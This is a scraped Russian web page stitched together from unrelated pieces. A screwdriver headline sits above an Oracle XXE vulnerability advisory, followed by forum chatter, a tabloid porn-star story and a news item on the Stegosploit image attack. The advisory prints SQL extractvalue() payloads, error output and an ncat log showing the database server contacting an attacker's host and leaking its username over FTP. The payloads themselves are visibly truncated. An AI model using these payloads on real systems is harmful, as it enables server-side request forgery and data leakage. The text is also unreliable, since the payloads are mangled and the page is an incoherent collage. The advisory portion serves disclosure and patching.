Как делаются отвертки со сменными насадками

Описание уязвимости

Модуль XML-парсера базы данных Oracle уязвим к XXE-инъекции (XML External Entity).

Уязвимые версии: 11.2.0.3, 11.2.0.4, 12.1.0.1 и 12.1.0.2

Необходимый уровень привилегий: Создание сессии

Технические детали

Из-за настроек безопасности XML-парсера в Oracle внешняя схема преобразуется (resolve), но не анализируется. Таким образом, предотвращается использование некоторых типов XXE-инъекций, например, связанных с чтение локальных файлов на удаленном сервере базы данных. Однако злоумышленник может отослать специальный SQL-запрос для вызова XML Resolver'а, заставляя сервер соединиться с удаленным ресурсом через HTTP или FTP. Этот трюк позволяет просачиваться информации через посторонние каналы, выполнять сканирование портов на удаленных внутренних системах, выполнять SSRF-атаки (Server-Side Request Forgery, Межсерверная подделка запросов) или создавать условия для DoS-атак.

Уязвимые обработчики URI:

· http:

· ftp:

XML-парсер в Oracle может быть вызван при помощи функции extractvalue() для объектаxmltype. Ниже показан пример запроса с простейшей полезной нагрузкой в XXE-инъекции:

select extractvalue(xmltype(']>'|| '&' ||'xxe;'),'/l') from dual;

Если выполнить вышеуказанный запрос, возникнет следующая ошибка:

ORA-31001: Invalid resource handle or path name "/etc/passwd"

ORA-06512: at "SYS.XMLTYPE", line 310

ORA-06512: at line 1

31001. 00000 - "Invalid resource handle or path name \"%s\""

*Cause: An invalid resource handle or path name was passed to

the XDB hierarchical resolver.

*Action: Pass a valid resouce handle or path name to the hierarchical

resolver.

Ошибка возникает по причине того, что обработчик FILE URI конвертируется в путь к XDB Repository. Однако изменение запроса и использование обработчика HTTP URI вызывает другую ошибку.

Пример:

select extractvalue(xmltype(']>'|| '&' ||'xxe;'),'/l') from dual;

Возникает следующая ошибка:

ORA-31020: The operation is not allowed,

Reason: For security reasons, ftp and http access over XDB repository is not allowed on server side

ORA-06512: at "SYS.XMLTYPE", line 310

ORA-06512: at line 1

31020. 00000 - "The operation is not allowed, Reason: %s"

*Cause: The operation attempted is not allowed

*Action: See reason and change to a valid operation.

Ошибка, приведенная выше, означает, что обработчики FTP URI или HTTP URI могут быть приняты XML-парсером. Обратите внимание, что запрос, приведенный выше, не отсылает никакие HTTP-запросы к системе злоумышленника. Давайте рассмотрим еще одну полезную нагрузку, которая привязана к Parameter Entity вместо Document Entity:

select extractvalue(xmltype(' %remote; %param1;]>'),'/l') from dual;

При запуске запроса выше на сервере баз данных возникнет та же сама ошибка (ORA-31020). Однако в этот раз сервер отсылает HTTP-запрос на ресурс с именем «test». Ниже приведен лог HTTP-запросов с сервера злоумышленника:

ncat -lvp 80

Ncat: Version 6.25 ( http://nmap.org/ncat )

Ncat: Listening on :::80

Ncat: Listening on 0.0.0.0:80

Ncat: Connection from DB_IP.

Ncat: Connection from DB_IP:27320.

GET /test HTTP/1.0

Host: DB_IP

Content-Type: text/plain; charset=utf-8

Обычно злоумышленнику требуется привилегированный доступ к пакету UTL_HTTP для того, чтобы спровоцировать сервер на создание HTTP-запросов к внешнему ресурсу. Поскольку функция extractvalue() доступна всем пользователям, XXE-инъекция предоставляет еще один способ отсылки «внеплановых» запросов без использования дополнительных привилегий.

Обработчик FTP URI (ftp также может использоваться для вызова XML Resolver’a в Oracle. Запрос, приведенный ниже, отсылает имя пользователя базы данных как имя пользователя FTP-сервера:

select extractvalue(xmltype(' %remote; %param1;]>'),'/l') from dual;

После запуска запроса возникает следующая ошибка (обратите внимание, что код ошибки отличается, поскольку предоставленные учетные данные не могут быть использованы для авторизации на удаленном FTP-сервере).

ORA-31011: XML parsing failed

ORA-19202: Error occurred in XML processing

LPX-00202: could not open "ftp://SYSTEM:bar@IP/test" (error 402)

Error at line 1

ORA-06512: at "SYS.XMLTYPE", line 310

ORA-06512: at line 1

31011. 00000 - "XML parsing failed"

*Cause: XML parser returned an error while trying to parse the document.

*Action: Check if the document to be parsed is valid.

Имя пользователя базы данных включено в FTP-трафик и отсылается на сервер злоумышленника как имя пользователя FTP-сервера:



Рисунок 1: Попытка соединения с FTP-сервером при помощи учетной записи базы данных

Рекомендации

Установите обновление CPUJan2015, выпущенное компанией Oracle.

Украс с секюритиЛАБ.РУ

так написано же уборка, борщ, интим.

Кстати из скрина видно СерГЕЙ 24 ЛЕТ. но что то у него табло старое для 24 ЛЕТ

Доброго дня.

Собственно заинтересовала эта новость. http://tass.ru/obschestvo/1984868

Прежде всего интересуют последствия этого закона для партнерских программ и продаж с товаров с одностраничников.

Если я правильно понял, то отношение имеет именно к партнерским программам.

Кто что думает по этому поводу?

[SIZE="15px"]Миллиардер арендовал известную порнозвезду на 15 лет[/SIZE]

[SIZE="15px"]

22-летняя порнозвезда русско-японского происхождения Рола Мисаки, также известная, как Рола Такизава, больше не принадлежит ни себе, ни своим поклонникам. Узкопрофильная актриса продалась на 15 лет в рабство за 7,5 миллионов долларов. Отныне ее хозяин неизвестный китайский миллиардер, сообщает Metro.



Неизвестного мужчину в маске видели в компании Ролы Такизавы на нескольких светских мероприятиях в Пекине. Согласно 15-летнему контракту, который заключила 22-летняя девушка с китайским предпринимателем, она больше не имеет права сниматься в фильмах для взрослых.

Многочисленные поклонники Ролы восприняли новость о сдаче их любимицы в аренду крайне негативно. "Как она могла так поступить с нами? Она была едва ли не самой естественной и натуральной актрисой в жанре. Это просто возмутительно", — написал один из фанатов Такизавы в китайской социальной сети Weibo.

Рола Такизава дебютировала в порнобизнесе в 2012 году, и с тех пор обрела большую армию фанатов, в основном из Китая.

22 мая 2015​

[/SIZE]

Представьте что он её поцелует.

Это пусть она представляет.. Ей же 15 лет горбатиться на него..

А так конечно: фу

Скрытый при помощи стенографии вредоносный код выполняется при просмотре изображения в браузере.

Индийский исследователь безопасности Саумил Шах (Saumil Shah) опубликовал отчет о разработанном им методе атаки, основанном на популярном среди пользователей обмене ссылок на изображения. Специалист смог скрыть исполняемый вредоносный код в пикселях произвольной картинки, оставляя таким образом свой эксплоит на самом видном месте.

Исследователь отмечает, что скрыть вредоносный код непосредственно в изображении было самым сложным и для этого ему пришлось использовать стенографию. Части вредоносного кода Шах распределил внутри пикселей картинки, что позволяет декодировать их обратно при помощи элемента Canvas в HTML 5, проводящего динамический рендеринг изображений.

«Для успешной атаки мне не нужно заботиться о хостинге собственного web-сайта. Мне даже не нужен какой-либо домен, - подчеркивает эксперт. – Я могу взять изображение, опубликовать его в открытом доступе и, если жертва загрузит его в своем браузере, оно скомпрометирует систему».

Отдельно специалист отметил, что изменения, возникающие в конечном изображении из-за наличия постороннего кода, заметны только при многократном увеличении картинки. Свою технику нападения Шах назвал Stegosploit, а ее подробности он раскрыл в ходе недавно проходившей в Амстердаме конференции по информационной безопасности Hack In The Box. Видео с подробностями атаки и комментариями эксперта опубликовано на YouTube.

http://www.securitylab.ru/news/473126.php